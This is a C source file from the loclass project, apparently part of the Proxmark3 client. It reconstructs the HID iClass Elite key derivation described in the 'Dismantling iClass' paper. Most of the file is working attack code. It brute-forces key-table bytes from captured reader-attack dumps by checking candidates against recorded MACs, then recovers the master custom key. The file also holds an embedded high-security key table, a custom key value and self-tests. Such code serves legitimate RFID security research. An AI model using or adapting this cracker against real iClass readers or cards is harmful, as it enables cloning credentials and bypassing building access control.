1 /*****************************************************************************
4 * THIS CODE IS CREATED FOR EXPERIMENTATION AND EDUCATIONAL USE ONLY.
6 * USAGE OF THIS CODE IN OTHER WAYS MAY INFRINGE UPON THE INTELLECTUAL
7 * PROPERTY OF OTHER PARTIES, SUCH AS INSIDE SECURE AND HID GLOBAL,
8 * AND MAY EXPOSE YOU TO AN INFRINGEMENT ACTION FROM THOSE PARTIES.
10 * THIS CODE SHOULD NEVER BE USED TO INFRINGE PATENTS OR INTELLECTUAL PROPERTY RIGHTS.
12 *****************************************************************************
14 * This file is part of loclass. It is a reconstructon of the cipher engine
15 * used in iClass, and RFID techology.
17 * The implementation is based on the work performed by
18 * Flavio D. Garcia, Gerhard de Koning Gans, Roel Verdult and
19 * Milosch Meriac in the paper "Dismantling IClass".
21 * Copyright (C) 2014 Martin Holst Swende
23 * This is free software: you can redistribute it and/or modify
24 * it under the terms of the GNU General Public License version 2 as published
25 * by the Free Software Foundation, or, at your option, any later version.
27 * This file is distributed in the hope that it will be useful,
28 * but WITHOUT ANY WARRANTY; without even the implied warranty of
29 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
30 * GNU General Public License for more details.
32 * You should have received a copy of the GNU General Public License
33 * along with loclass. If not, see <http://www.gnu.org/licenses/>.
36 ****************************************************************************/
43 #include "util_posix.h"
44 #include "cipherutils.h"
47 #include "elite_crack.h"
48 #include "fileutils.h"
49 #include "mbedtls/des.h"
52 * @brief Permutes a key from standard NIST format to Iclass specific format
53 * from http://www.proxmark.org/forum/viewtopic.php?pid=11220#p11220
55 * If you permute [6c 8d 44 f9 2a 2d 01 bf] you get [8a 0d b9 88 bb a7 90 ea] as shown below.
72 void permutekey(uint8_t key
[8], uint8_t dest
[8])
76 for(i
= 0 ; i
< 8 ; i
++)
78 dest
[i
] = (((key
[7] & (0x80 >> i
)) >> (7-i
)) << 7) |
79 (((key
[6] & (0x80 >> i
)) >> (7-i
)) << 6) |
80 (((key
[5] & (0x80 >> i
)) >> (7-i
)) << 5) |
81 (((key
[4] & (0x80 >> i
)) >> (7-i
)) << 4) |
82 (((key
[3] & (0x80 >> i
)) >> (7-i
)) << 3) |
83 (((key
[2] & (0x80 >> i
)) >> (7-i
)) << 2) |
84 (((key
[1] & (0x80 >> i
)) >> (7-i
)) << 1) |
85 (((key
[0] & (0x80 >> i
)) >> (7-i
)) << 0);
91 * Permutes a key from iclass specific format to NIST format
92 * @brief permutekey_rev
96 void permutekey_rev(uint8_t key
[8], uint8_t dest
[8])
99 for(i
= 0 ; i
< 8 ; i
++)
101 dest
[7-i
] = (((key
[0] & (0x80 >> i
)) >> (7-i
)) << 7) |
102 (((key
[1] & (0x80 >> i
)) >> (7-i
)) << 6) |
103 (((key
[2] & (0x80 >> i
)) >> (7-i
)) << 5) |
104 (((key
[3] & (0x80 >> i
)) >> (7-i
)) << 4) |
105 (((key
[4] & (0x80 >> i
)) >> (7-i
)) << 3) |
106 (((key
[5] & (0x80 >> i
)) >> (7-i
)) << 2) |
107 (((key
[6] & (0x80 >> i
)) >> (7-i
)) << 1) |
108 (((key
[7] & (0x80 >> i
)) >> (7-i
)) << 0);
113 * Helper function for hash1
118 uint8_t rr(uint8_t val
)
120 return val
>> 1 | (( val
& 1) << 7);
123 * Helper function for hash1
128 uint8_t rl(uint8_t val
)
130 return val
<< 1 | (( val
& 0x80) >> 7);
133 * Helper function for hash1
138 uint8_t swap(uint8_t val
)
140 return ((val
>> 4) & 0xFF) | ((val
&0xFF) << 4);
144 * Hash1 takes CSN as input, and determines what bytes in the keytable will be used
145 * when constructing the K_sel.
146 * @param csn the CSN used
149 void hash1(uint8_t csn
[] , uint8_t k
[])
151 k
[0] = csn
[0]^csn
[1]^csn
[2]^csn
[3]^csn
[4]^csn
[5]^csn
[6]^csn
[7];
152 k
[1] = csn
[0]+csn
[1]+csn
[2]+csn
[3]+csn
[4]+csn
[5]+csn
[6]+csn
[7];
153 k
[2] = rr(swap( csn
[2]+k
[1] ));
154 k
[3] = rl(swap( csn
[3]+k
[0] ));
155 k
[4] = ~rr( csn
[4]+k
[2] )+1;
156 k
[5] = ~rl( csn
[5]+k
[3] )+1;
157 k
[6] = rr( csn
[6]+(k
[4]^0x3c) );
158 k
[7] = rl( csn
[7]+(k
[5]^0xc3) );
160 for(i
= 7; i
>=0; i
--)
164 Definition 14. Define the rotate key function rk : (F 82 ) 8 × N → (F 82 ) 8 as
165 rk(x [0] . . . x [7] , 0) = x [0] . . . x [7]
166 rk(x [0] . . . x [7] , n + 1) = rk(rl(x [0] ) . . . rl(x [7] ), n)
168 void rk(uint8_t *key
, uint8_t n
, uint8_t *outp_key
)
171 memcpy(outp_key
, key
, 8);
176 for(j
=0; j
< 8 ; j
++)
177 outp_key
[j
] = rl(outp_key
[j
]);
182 static mbedtls_des_context ctx_enc
= { {0} };
183 static mbedtls_des_context ctx_dec
= { {0} };
185 void desdecrypt_iclass(uint8_t *iclass_key
, uint8_t *input
, uint8_t *output
)
187 uint8_t key_std_format
[8] = {0};
188 permutekey_rev(iclass_key
, key_std_format
);
189 mbedtls_des_setkey_dec( &ctx_dec
, key_std_format
);
190 mbedtls_des_crypt_ecb(&ctx_dec
,input
,output
);
192 void desencrypt_iclass(uint8_t *iclass_key
, uint8_t *input
, uint8_t *output
)
194 uint8_t key_std_format
[8] = {0};
195 permutekey_rev(iclass_key
, key_std_format
);
196 mbedtls_des_setkey_enc( &ctx_enc
, key_std_format
);
197 mbedtls_des_crypt_ecb(&ctx_enc
,input
,output
);
201 * @brief Insert uint8_t[8] custom master key to calculate hash2 and return key_select.
202 * @param key unpermuted custom key
204 * @param key_sel output key_sel=h[hash1[i]]
206 void hash2(uint8_t *key64
, uint8_t *outp_keytable
)
210 * High Security Key Table
212 00 F1 35 59 A1 0D 5A 26 7F 18 60 0B 96 8A C0 25 C1
213 10 BF A1 3B B0 FF 85 28 75 F2 1F C6 8F 0E 74 8F 21
214 20 14 7A 55 16 C8 A9 7D B3 13 0C 5D C9 31 8D A9 B2
215 30 A3 56 83 0F 55 7E DE 45 71 21 D2 6D C1 57 1C 9C
216 40 78 2F 64 51 42 7B 64 30 FA 26 51 76 D3 E0 FB B6
217 50 31 9F BF 2F 7E 4F 94 B4 BD 4F 75 91 E3 1B EB 42
218 60 3F 88 6F B8 6C 2C 93 0D 69 2C D5 20 3C C1 61 95
219 70 43 08 A0 2F FE B3 26 D7 98 0B 34 7B 47 70 A0 AB
221 **** The 64-bit HS Custom Key Value = 5B7C62C491C11B39 ******/
222 uint8_t key64_negated
[8] = {0};
223 uint8_t z
[8][8]={{0},{0}};
224 uint8_t temp_output
[8]={0};
225 //calculate complement of key
228 key64_negated
[i
]= ~key64
[i
];
230 // Once again, key is on iclass-format
231 desencrypt_iclass(key64
, key64_negated
, z
[0]);
233 prnlog("\nHigh security custom key (Kcus):");
234 printvar("z0 ", z
[0],8);
236 uint8_t y
[8][8]={{0},{0}};
238 // y[0]=DES_dec(z[0],~key)
239 // Once again, key is on iclass-format
240 desdecrypt_iclass(z
[0], key64_negated
, y
[0]);
241 printvar("y0 ", y
[0],8);
246 // z [i] = DES dec (rk(K cus , i), z [i−1] )
247 rk(key64
, i
, temp_output
);
248 //y [i] = DES enc (rk(K cus , i), y [i−1] )
250 desdecrypt_iclass(temp_output
,z
[i
-1], z
[i
]);
251 desencrypt_iclass(temp_output
,y
[i
-1], y
[i
]);
254 if(outp_keytable
!= NULL
)
256 for(i
= 0 ; i
< 8 ; i
++)
258 memcpy(outp_keytable
+i
*16,y
[i
],8);
259 memcpy(outp_keytable
+8+i
*16,z
[i
],8);
263 printarr_human_readable("hash2", outp_keytable
,128);
268 * @brief Reads data from the iclass-reader-attack dump file.
269 * @param dump, data from a iclass reader attack dump. The format of the dumpdata is expected to be as follows:
270 * <8 byte CSN><8 byte CC><4 byte NR><4 byte MAC><8 byte HASH1><1 byte NUM_BYTES_TO_RECOVER><3 bytes BYTES_TO_RECOVER>
273 * So the first attack, with 3 bytes to recover would be : ... 03000145
274 * And a later attack, with 1 byte to recover (byte 0x5)would be : ...01050000
275 * And an attack, with 2 bytes to recover (byte 0x5 and byte 0x07 )would be : ...02050700
277 * @param cc_nr an array to store cc_nr into (12 bytes)
278 * @param csn an arracy ot store CSN into (8 bytes)
279 * @param received_mac an array to store MAC into (4 bytes)
280 * @param i the number to read. Should be less than 127, or something is wrong...
283 int _readFromDump(uint8_t dump
[], dumpdata
* item
, uint8_t i
)
285 size_t itemsize
= sizeof(dumpdata
);
286 //dumpdata item = {0};
287 memcpy(item
,dump
+i
*itemsize
, itemsize
);
290 printvar("csn", item
->csn
,8);
291 printvar("cc_nr", item
->cc_nr
,12);
292 printvar("mac", item
->mac
,4);
297 static uint32_t startvalue
= 0;
299 * @brief Performs brute force attack against a dump-data item, containing csn, cc_nr and mac.
300 *This method calculates the hash1 for the CSN, and determines what bytes need to be bruteforced
301 *on the fly. If it finds that more than three bytes need to be bruteforced, it aborts.
302 *It updates the keytable with the findings, also using the upper half of the 16-bit ints
303 *to signal if the particular byte has been cracked or not.
305 * @param dump The dumpdata from iclass reader attack.
306 * @param keytable where to write found values.
309 int bruteforceItem(dumpdata item
, uint16_t keytable
[])
312 uint8_t key_sel_p
[8] = { 0 };
313 uint8_t div_key
[8] = {0};
315 uint8_t key_sel
[8] = {0};
316 uint8_t calculated_MAC
[4] = { 0 };
318 //Get the key index (hash1)
319 uint8_t key_index
[8] = {0};
320 hash1(item
.csn
, key_index
);
324 * Determine which bytes to retrieve. A hash is typically
326 * We go through that hash, and in the corresponding keytable, we put markers
327 * on what state that particular index is:
328 * - CRACKED (this has already been cracked)
329 * - BEING_CRACKED (this is being bruteforced now)
330 * - CRACK_FAILED (self-explaining...)
332 * The markers are placed in the high area of the 16 bit key-table.
333 * Only the lower eight bits correspond to the (hopefully cracked) key-value.
335 uint8_t bytes_to_recover
[3] = {0};
336 uint8_t numbytes_to_recover
= 0;
338 for(int i
= 0; i
< 8; i
++) {
339 if (keytable
[key_index
[i
]] & (CRACKED
| BEING_CRACKED
)) continue;
340 bytes_to_recover
[numbytes_to_recover
++] = key_index
[i
];
341 keytable
[key_index
[i
]] |= BEING_CRACKED
;
343 if(numbytes_to_recover
> 3) {
344 prnlog("The CSN requires > 3 byte bruteforce, not supported");
345 printvar("CSN", item
.csn
,8);
346 printvar("HASH1", key_index
,8);
348 //Before we exit, reset the 'BEING_CRACKED' to zero
349 keytable
[bytes_to_recover
[0]] &= ~BEING_CRACKED
;
350 keytable
[bytes_to_recover
[1]] &= ~BEING_CRACKED
;
351 keytable
[bytes_to_recover
[2]] &= ~BEING_CRACKED
;
358 *A uint32 has room for 4 bytes, we'll only need 24 of those bits to bruteforce up to three bytes,
360 uint32_t brute
= startvalue
;
362 Determine where to stop the bruteforce. A 1-byte attack stops after 256 tries,
363 (when brute reaches 0x100). And so on...
364 bytes_to_recover = 1 --> endmask = 0x0000100
365 bytes_to_recover = 2 --> endmask = 0x0010000
366 bytes_to_recover = 3 --> endmask = 0x1000000
369 uint32_t endmask
= 1 << 8*numbytes_to_recover
;
371 for (int i
= 0; i
< numbytes_to_recover
&& numbytes_to_recover
> 1; i
++) {
372 prnlog("Bruteforcing byte %d", bytes_to_recover
[i
]);
375 while(!found
&& !(brute
& endmask
)) {
377 //Update the keytable with the brute-values
378 for (int i
= 0; i
< numbytes_to_recover
; i
++) {
379 keytable
[bytes_to_recover
[i
]] &= 0xFF00;
380 keytable
[bytes_to_recover
[i
]] |= (brute
>> (i
*8) & 0xFF);
383 // Piece together the key
384 key_sel
[0] = keytable
[key_index
[0]] & 0xFF;key_sel
[1] = keytable
[key_index
[1]] & 0xFF;
385 key_sel
[2] = keytable
[key_index
[2]] & 0xFF;key_sel
[3] = keytable
[key_index
[3]] & 0xFF;
386 key_sel
[4] = keytable
[key_index
[4]] & 0xFF;key_sel
[5] = keytable
[key_index
[5]] & 0xFF;
387 key_sel
[6] = keytable
[key_index
[6]] & 0xFF;key_sel
[7] = keytable
[key_index
[7]] & 0xFF;
389 //Permute from iclass format to standard format
390 permutekey_rev(key_sel
,key_sel_p
);
392 diversifyKey(item
.csn
, key_sel_p
, div_key
);
394 doMAC(item
.cc_nr
, div_key
, calculated_MAC
);
396 if (memcmp(calculated_MAC
, item
.mac
, 4) == 0) {
397 for (int i
=0 ; i
< numbytes_to_recover
; i
++)
398 prnlog("=> %d: 0x%02x", bytes_to_recover
[i
], 0xFF & keytable
[bytes_to_recover
[i
]]);
403 if ((brute
& 0xFFFF) == 0) {
404 printf("%d",(brute
>> 16) & 0xFF);
409 prnlog("Failed to recover %d bytes using the following CSN",numbytes_to_recover
);
410 printvar("CSN",item
.csn
,8);
412 //Before we exit, reset the 'BEING_CRACKED' to zero
413 for (int i
= 0; i
< numbytes_to_recover
; i
++) {
414 keytable
[bytes_to_recover
[i
]] &= 0xFF;
415 keytable
[bytes_to_recover
[i
]] |= CRACK_FAILED
;
418 for (int i
= 0 ;i
< numbytes_to_recover
; i
++) {
419 keytable
[bytes_to_recover
[i
]] &= 0xFF;
420 keytable
[bytes_to_recover
[i
]] |= CRACKED
;
428 * From dismantling iclass-paper:
429 * Assume that an adversary somehow learns the first 16 bytes of hash2(K_cus ), i.e., y [0] and z [0] .
430 * Then he can simply recover the master custom key K_cus by computing
431 * K_cus = ~DES(z[0] , y[0] ) .
433 * Furthermore, the adversary is able to verify that he has the correct K cus by
434 * checking whether z [0] = DES enc (K_cus , ~K_cus ).
435 * @param keytable an array (128 bytes) of hash2(kcus)
436 * @param master_key where to put the master key
437 * @return 0 for ok, 1 for failz
439 int calculateMasterKey(uint8_t first16bytes
[], uint64_t master_key
[] )
441 mbedtls_des_context ctx_e
= { {0} };
443 uint8_t z_0
[8] = {0};
444 uint8_t y_0
[8] = {0};
445 uint8_t z_0_rev
[8] = {0};
446 uint8_t key64
[8] = {0};
447 uint8_t key64_negated
[8] = {0};
448 uint8_t result
[8] = {0};
450 // y_0 and z_0 are the first 16 bytes of the keytable
451 memcpy(y_0
,first16bytes
,8);
452 memcpy(z_0
,first16bytes
+8,8);
454 // Our DES-implementation uses the standard NIST
455 // format for keys, thus must translate from iclass
456 // format to NIST-format
457 permutekey_rev(z_0
, z_0_rev
);
459 // ~K_cus = DESenc(z[0], y[0])
460 mbedtls_des_setkey_enc( &ctx_e
, z_0_rev
);
461 mbedtls_des_crypt_ecb(&ctx_e
, y_0
, key64_negated
);
464 for(i
= 0; i
< 8 ; i
++)
466 key64
[i
] = ~key64_negated
[i
];
469 // Can we verify that the key is correct?
470 // Once again, key is on iclass-format
471 uint8_t key64_stdformat
[8] = {0};
472 permutekey_rev(key64
, key64_stdformat
);
474 mbedtls_des_setkey_enc( &ctx_e
, key64_stdformat
);
475 mbedtls_des_crypt_ecb(&ctx_e
, key64_negated
, result
);
476 prnlog("\nHigh security custom key (Kcus):");
477 printvar("Std format ", key64_stdformat
,8);
478 printvar("Iclass format", key64
,8);
480 if(master_key
!= NULL
)
481 memcpy(master_key
, key64
, 8);
483 if(memcmp(z_0
,result
,4) != 0)
485 prnlog("Failed to verify calculated master key (k_cus)! Something is wrong.");
488 prnlog("Key verified ok!\n");
493 * @brief Same as bruteforcefile, but uses a an array of dumpdata instead
499 int bruteforceDump(uint8_t dump
[], size_t dumpsize
, uint16_t keytable
[])
503 size_t itemsize
= sizeof(dumpdata
);
504 uint64_t t1
= msclock();
506 dumpdata
* attack
= (dumpdata
* ) malloc(itemsize
);
508 for (i
= 0 ; i
* itemsize
< dumpsize
; i
++ )
510 memcpy(attack
,dump
+i
*itemsize
, itemsize
);
511 errors
+= bruteforceItem(*attack
, keytable
);
515 float diff
= (float)t1
/ 1000.0;
516 prnlog("\nPerformed full crack in %f seconds", diff
);
518 // Pick out the first 16 bytes of the keytable.
519 // The keytable is now in 16-bit ints, where the upper 8 bits
520 // indicate crack-status. Those must be discarded for the
521 // master key calculation
522 uint8_t first16bytes
[16] = {0};
524 for(i
= 0 ; i
< 16 ; i
++)
526 first16bytes
[i
] = keytable
[i
] & 0xFF;
527 if(!(keytable
[i
] & CRACKED
))
529 prnlog("Error, we are missing byte %d, custom key calculation will fail...", i
);
532 errors
+= calculateMasterKey(first16bytes
, NULL
);
536 * Perform a bruteforce against a file which has been saved by pm3
538 * @brief bruteforceFile
542 int bruteforceFile(const char *filename
, uint16_t keytable
[])
545 FILE *f
= fopen(filename
, "rb");
547 prnlog("Failed to read from file '%s'", filename
);
551 fseek(f
, 0, SEEK_END
);
552 long fsize
= ftell(f
);
553 fseek(f
, 0, SEEK_SET
);
556 prnlog("Error, when getting fsize");
561 uint8_t *dump
= malloc(fsize
);
562 size_t bytes_read
= fread(dump
, 1, fsize
, f
);
565 if (bytes_read
< fsize
) {
566 prnlog("Error, could only read %d bytes (should be %d)",bytes_read
, fsize
);
569 uint8_t res
= bruteforceDump(dump
,fsize
,keytable
);
575 * @brief Same as above, if you don't care about the returned keytable (results only printed on screen)
579 int bruteforceFileNoKeys(const char *filename
)
581 uint16_t keytable
[128] = {0};
582 return bruteforceFile(filename
, keytable
);
585 // ---------------------------------------------------------------------------------
586 // ALL CODE BELOW THIS LINE IS PURELY TESTING
587 // ---------------------------------------------------------------------------------
588 // ----------------------------------------------------------------------------
590 // ----------------------------------------------------------------------------
592 int _testBruteforce()
597 prnlog("[+] Testing crack from dumpfile...");
600 Expected values for the dumpfile:
601 High Security Key Table
603 00 F1 35 59 A1 0D 5A 26 7F 18 60 0B 96 8A C0 25 C1
604 10 BF A1 3B B0 FF 85 28 75 F2 1F C6 8F 0E 74 8F 21
605 20 14 7A 55 16 C8 A9 7D B3 13 0C 5D C9 31 8D A9 B2
606 30 A3 56 83 0F 55 7E DE 45 71 21 D2 6D C1 57 1C 9C
607 40 78 2F 64 51 42 7B 64 30 FA 26 51 76 D3 E0 FB B6
608 50 31 9F BF 2F 7E 4F 94 B4 BD 4F 75 91 E3 1B EB 42
609 60 3F 88 6F B8 6C 2C 93 0D 69 2C D5 20 3C C1 61 95
610 70 43 08 A0 2F FE B3 26 D7 98 0B 34 7B 47 70 A0 AB
612 **** The 64-bit HS Custom Key Value = 5B7C62C491C11B39 ****
614 uint16_t keytable
[128] = {0};
616 //Test a few variants
617 if(fileExists("iclass_dump.bin"))
619 errors
|= bruteforceFile("iclass_dump.bin",keytable
);
620 }else if(fileExists("loclass/iclass_dump.bin")){
621 errors
|= bruteforceFile("loclass/iclass_dump.bin",keytable
);
622 }else if(fileExists("client/loclass/iclass_dump.bin")){
623 errors
|= bruteforceFile("client/loclass/iclass_dump.bin",keytable
);
625 prnlog("Error: The file iclass_dump.bin was not found!");
631 int _test_iclass_key_permutation()
633 uint8_t testcase
[8] = {0x6c,0x8d,0x44,0xf9,0x2a,0x2d,0x01,0xbf};
634 uint8_t testcase_output
[8] = {0};
635 uint8_t testcase_output_correct
[8] = {0x8a,0x0d,0xb9,0x88,0xbb,0xa7,0x90,0xea};
636 uint8_t testcase_output_rev
[8] = {0};
637 permutekey(testcase
, testcase_output
);
638 permutekey_rev(testcase_output
, testcase_output_rev
);
641 if(memcmp(testcase_output
, testcase_output_correct
,8) != 0)
643 prnlog("Error with iclass key permute!");
644 printarr("testcase_output", testcase_output
, 8);
645 printarr("testcase_output_correct", testcase_output_correct
, 8);
649 if(memcmp(testcase
, testcase_output_rev
, 8) != 0)
651 prnlog("Error with reverse iclass key permute");
652 printarr("testcase", testcase
, 8);
653 printarr("testcase_output_rev", testcase_output_rev
, 8);
657 prnlog("[+] Iclass key permutation OK!");
662 uint8_t csn
[8]= {0x01,0x02,0x03,0x04,0xF7,0xFF,0x12,0xE0};
665 uint8_t expected
[8] = {0x7E,0x72,0x2F,0x40,0x2D,0x02,0x51,0x42};
666 if(memcmp(k
,expected
,8) != 0)
668 prnlog("Error with hash1!");
669 printarr("calculated", k
, 8);
670 printarr("expected", expected
, 8);
678 prnlog("[+] Testing iClass Elite functinality...");
679 prnlog("[+] Testing hash2");
680 uint8_t k_cus
[8] = {0x5B,0x7C,0x62,0xC4,0x91,0xC1,0x1B,0x39};
684 * High Security Key Table
686 00 F1 35 59 A1 0D 5A 26 7F 18 60 0B 96 8A C0 25 C1
687 10 BF A1 3B B0 FF 85 28 75 F2 1F C6 8F 0E 74 8F 21
688 20 14 7A 55 16 C8 A9 7D B3 13 0C 5D C9 31 8D A9 B2
689 30 A3 56 83 0F 55 7E DE 45 71 21 D2 6D C1 57 1C 9C
690 40 78 2F 64 51 42 7B 64 30 FA 26 51 76 D3 E0 FB B6
691 50 31 9F BF 2F 7E 4F 94 B4 BD 4F 75 91 E3 1B EB 42
692 60 3F 88 6F B8 6C 2C 93 0D 69 2C D5 20 3C C1 61 95
693 70 43 08 A0 2F FE B3 26 D7 98 0B 34 7B 47 70 A0 AB
697 **** The 64-bit HS Custom Key Value = 5B7C62C491C11B39 ****
699 uint8_t keytable
[128] = {0};
700 hash2(k_cus
, keytable
);
701 printarr_human_readable("Hash2", keytable
, 128);
702 if(keytable
[3] == 0xA1 && keytable
[0x30] == 0xA3 && keytable
[0x6F] == 0x95)
704 prnlog("[+] Hash2 looks fine...");
708 prnlog("[+] Testing hash1...");
709 errors
+= _testHash1();
710 prnlog("[+] Testing key diversification ...");
711 errors
+=_test_iclass_key_permutation();
712 errors
+= _testBruteforce();